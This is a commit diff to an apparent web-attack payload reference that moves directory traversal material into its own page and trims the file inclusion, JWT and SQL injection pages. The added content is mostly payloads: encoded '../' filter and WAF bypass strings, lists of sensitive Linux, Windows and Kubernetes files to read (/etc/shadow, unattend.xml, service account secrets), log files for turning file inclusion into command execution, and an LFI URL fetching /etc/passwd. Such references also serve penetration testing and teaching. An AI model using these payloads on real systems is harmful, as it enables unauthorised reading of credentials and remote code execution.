Directory traversal / File inclusion rewritten

Directory traversal/README.md

@@ -0,0 +1,129 @@
+# Directory traversal
+
+> A directory or path traversal consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs.
+
+## Summary
+
+* [Basic exploitation](#basic-exploitation)
+* [Path Traversal](#path-traversal)
+
+## Basic exploitation
+
+We can use the `..` characters to access the parent directory, the following strings are several encoding that can help you bypass a poorly implemented filter.
+
+```powershell
+../
+..\
+..\/
+%2e%2e%2f
+%252e%252e%252f
+%c0%ae%c0%ae%c0%af
+%uff0e%uff0e%u2215
+%uff0e%uff0e%u2216
+```
+
+16 bit Unicode encoding
+
+```powershell
+. = %u002e
+/ = %u2215
+\ = %u2216
+```
+
+UTF-8 Unicode encoding
+
+```powershell
+. = %c0%2e, %e0%40%ae, %c0ae
+/ = %c0%af, %e0%80%af, %c0%2f
+\ = %c0%5c, %c0%80%5c
+```
+
+Sometimes you encounter a WAF which remove the "../" characters from the strings, just duplicate them.
+
+```powershell
+..././
+...\.\
+```
+
+Double URL encoding
+
+```powershell
+. = %252e
+/ = %252f
+\ = %255c
+```
+
+
+## Path Traversal
+
+Linux - Interesting files to check out :
+
+```powershell
+/etc/issue
+/etc/passwd
+/etc/shadow
+/etc/group
+/etc/hosts
+/etc/motd
+/etc/mysql/my.cnf
+/proc/[0-9]*/fd/[0-9]*   (first number is the PID, second is the filedescriptor)
+/proc/self/environ
+/proc/version
+/proc/cmdline
+/proc/sched_debug
+/proc/mounts
+/proc/net/arp
+/proc/net/route
+/proc/net/tcp
+/proc/net/udp
+```
+
+Windows - Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)
+
+```powershell
+c:/boot.ini
+c:/inetpub/logs/logfiles
+c:/inetpub/wwwroot/global.asa
+c:/inetpub/wwwroot/index.asp
+c:/inetpub/wwwroot/web.config
+c:/sysprep.inf
+c:/sysprep.xml
+c:/sysprep/sysprep.inf
+c:/sysprep/sysprep.xml
+c:/system32/inetsrv/metabase.xml
+c:/sysprep.inf
+c:/sysprep.xml
+c:/sysprep/sysprep.inf
+c:/sysprep/sysprep.xml
+c:/system volume information/wpsettings.dat
+c:/system32/inetsrv/metabase.xml
+c:/unattend.txt
+c:/unattend.xml
+c:/unattended.txt
+c:/unattended.xml
+```
+
+The following log files are controllable and can be included with an evil payload to achieve a command execution
+
+```powershell
+/var/log/apache/access.log
+/var/log/apache/error.log
+/var/log/httpd/error_log
+/usr/local/apache/log/error_log
+/usr/local/apache2/log/error_log
+/var/log/vsftpd.log
+/var/log/sshd.log
+/var/log/mail
+```
+
+Other easy win files.
+
+```powershell
+/home/$USER/.bash_history
+/var/run/secrets/kubernetes.io/serviceaccount
+```
+
+
+## References
+
+* [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack)

File inclusion/README.md

@@ -1,4 +1,4 @@
-# File Inclusion - Path Traversal
+# File Inclusion
 
 The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application.
 
@@ -6,7 +6,6 @@ The Path Traversal vulnerability allows an attacker to access a file, usually ex
 
 ## Summary
 
-* [Path Traversal](#path-traversal)
 * [Basic LFI](#basic-lfi)
 * [Basic RFI](#basic-rfi)
 * [LFI / RFI using wrappers](#lfi--rfi-using-wrappers)
@@ -24,78 +23,10 @@ The Path Traversal vulnerability allows an attacker to access a file, usually ex
 * [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file)
 * [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions)
 
-
-## Path Traversal
-
-Linux - Interesting files to check out :
-
-```powershell
-/etc/issue
-/etc/passwd
-/etc/shadow
-/etc/group
-/etc/hosts
-/etc/motd
-/etc/mysql/my.cnf
-/proc/[0-9]*/fd/[0-9]*   (first number is the PID, second is the filedescriptor)
-/proc/self/environ
-/proc/version
-/proc/cmdline
-/proc/sched_debug
-/proc/mounts
-/proc/net/arp
-/proc/net/route
-/proc/net/tcp
-/proc/net/udp
-```
-
-Windows - Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)
-
-```powershell
-c:/boot.ini
-c:/inetpub/logs/logfiles
-c:/inetpub/wwwroot/global.asa
-c:/inetpub/wwwroot/index.asp
-c:/inetpub/wwwroot/web.config
-c:/sysprep.inf
-c:/sysprep.xml
-c:/sysprep/sysprep.inf
-c:/sysprep/sysprep.xml
-c:/system32/inetsrv/metabase.xml
-c:/sysprep.inf
-c:/sysprep.xml
-c:/sysprep/sysprep.inf
-c:/sysprep/sysprep.xml
-c:/system volume information/wpsettings.dat
-c:/system32/inetsrv/metabase.xml
-c:/unattend.txt
-c:/unattend.xml
-c:/unattended.txt
-c:/unattended.xml
-```
-
-The following log files are controllable and can be included with an evil payload to achieve a command execution
-
-```powershell
-/var/log/apache/access.log
-/var/log/apache/error.log
-/var/log/httpd/error_log
-/usr/local/apache/log/error_log
-/usr/local/apache2/log/error_log
-/var/log/vsftpd.log
-/var/log/sshd.log
-/var/log/mail
-```
-
-Other easy win files.
-
-```powershell
-/home/$USER/.bash_history
-/var/run/secrets/kubernetes.io/serviceaccount
-```
-
 ## Basic LFI
 
+In the following examples we include the `/etc/passwd` file, check the `Directory & Path Traversal` chapter for more interesting files.
+
 ```powershell
 http://example.com/index.php?page=../../../etc/passwd
 ```

JSON Web Token/README.md

@@ -2,6 +2,8 @@
 
 > JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed.
 
+## Summary 
+
 - JWT Format
 - JWT Signature - None algorithm
 - JWT Signature - RS256 to HS256

SQL injection/README.md

@@ -1,6 +1,12 @@
 # SQL injection
 
-A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application.
+> A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application.
+
+Attempting to manipulate SQL queries may have goals including:
+- Information Leakage
+- Disclosure of stored data
+- Manipulation of stored data
+- Bypassing authorisation controls
 
 ## Summary
 

Traversal directory/README.md

@@ -1,48 +0,0 @@
-# Traversal Directory
-
-A directory traversal consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs.
-
-## Exploit
-
-Basic
-
-```powershell
-../
-..\
-..\/
-%2e%2e%2f
-%252e%252e%252f
-%c0%ae%c0%ae%c0%af
-%uff0e%uff0e%u2215
-%uff0e%uff0e%u2216
-..././
-...\.\
-```
-
-16 bit Unicode encoding
-
-```powershell
-. = %u002e
-/ = %u2215
-\ = %u2216
-```
-
-Double URL encoding
-
-```powershell
-. = %252e
-/ = %252f
-\ = %255c
-```
-
-UTF-8 Unicode encoding
-
-```powershell
-. = %c0%2e, %e0%40%ae, %c0ae
-/ = %c0%af, %e0%80%af, %c0%2f
-\ = %c0%5c, %c0%80%5c
-```
-
-## References
-
-* [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack)